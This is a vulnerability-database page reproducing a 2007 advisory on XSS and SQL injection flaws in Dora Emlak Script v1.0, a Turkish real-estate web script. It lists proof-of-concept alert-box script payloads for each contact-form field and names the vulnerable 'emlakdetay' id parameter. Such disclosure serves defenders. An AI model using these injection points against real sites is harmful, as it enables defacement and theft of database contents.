Lucene search
doraemlak-xsssql.txt
Dora Emlak Script v1.0 XSS & sql injection Vulnerability. It allows XSS code injection through the text box and SQL injection via the 'emlakdetay' parameter
Show more
`Dora Emlak Script v1.0 XSS & sql injection Vulnerability.
#Software: Dora Emlak Script v1.0
#download: http://www.aspindir.com/goster/5027
#demo: http://www.fatihkaratas.info/dora/
#Found By: GeFORC3 ( G3 )
#Exploit:
1-http://www.example.com/dora/default.asp?goster=iletisim
You write xss code in page's text box
Adýnýz <script>alert("G3");</script>
Soyadýnýz <script>alert("G3");</script>
Mail Adresiniz <script>alert("G3");</script>
Konu <script>alert("G3");</script>
Mesajýnýz <script>alert("G3");</script>
Press to "gönder"(send) button.
This xss works on Dora Emlak Script v1.0
+
http://www.example.com//dora/default.asp?goster=emlakdetay&id= [SQL]
WwW.GeFORC3.Org | WwW.HeykirBlog.Com | WwW.NetKaBus.Com
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo23 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4